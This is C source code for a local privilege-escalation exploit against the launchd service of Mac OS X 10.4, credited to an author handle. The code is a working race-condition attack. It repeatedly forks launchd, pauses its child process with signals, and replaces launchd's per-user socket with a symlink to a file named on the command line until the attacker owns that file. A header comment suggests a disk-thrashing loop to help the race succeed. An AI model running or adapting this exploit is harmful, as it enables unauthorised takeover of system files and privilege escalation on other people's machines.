/* * Mac OS X 10.4 launchd race condition exploit * * Note: sometimes the disk needs a little coercion * while ((1));do find / 1>/dev/null 2>&1;done & * * intropy (intropy caughq.org) */ #include #include #include #include #include #include #include main(int argc, char *argv[]) { pid_t pid; int count, status; char name[100]; char target[100]; struct stat *stats = (struct stat *)malloc(sizeof(struct stat)); if ( argc < 2 ) { fprintf(stderr, "%s \n", argv[0]); return(-1); } strncpy(target, argv[1], sizeof(target)-1); printf("Going for %s\n", target); loop: while ( 1 ) { stat(target, stats); if ( stats->st_uid == getuid() ) { printf("Got it!\n"); return(0); } pid = fork(); if ( pid == 0 ) { system("nice -n 19 /sbin/launchd -v /bin/ls -lR /var/launchd/ 1>/dev/null 2>&1"); } else { snprintf(name, sizeof(name)-1, "/var/launchd/501.%d/sock", pid+2); for ( count = 0; (kill(pid+2, SIGSTOP)) != 0 && count < 10000; count++ ); if ( count == 10000 ) { printf("count %d\n", count); goto loop; } while ( (unlink(name)) != 0 ) { kill(pid+2, SIGCONT); if ( (kill(pid+2, SIGSTOP)) != 0 ) { printf("Couldnt SIGSTOP during unlink\n"); goto loop; } } while ( (symlink(target, name)) != 0 ) { kill(pid+2, SIGCONT); if ( (kill(pid+2, SIGSTOP)) != 0 ) { printf("Couldnt SIGSTOP during symlink\n"); goto loop; } } printf("Created symlink %s -> %s...\n", name, target); if ( (kill(pid+2, SIGCONT)) != 0 ) { printf("Couldnt SIGCONT after symlink %s\n"); goto loop; } } } return(1); }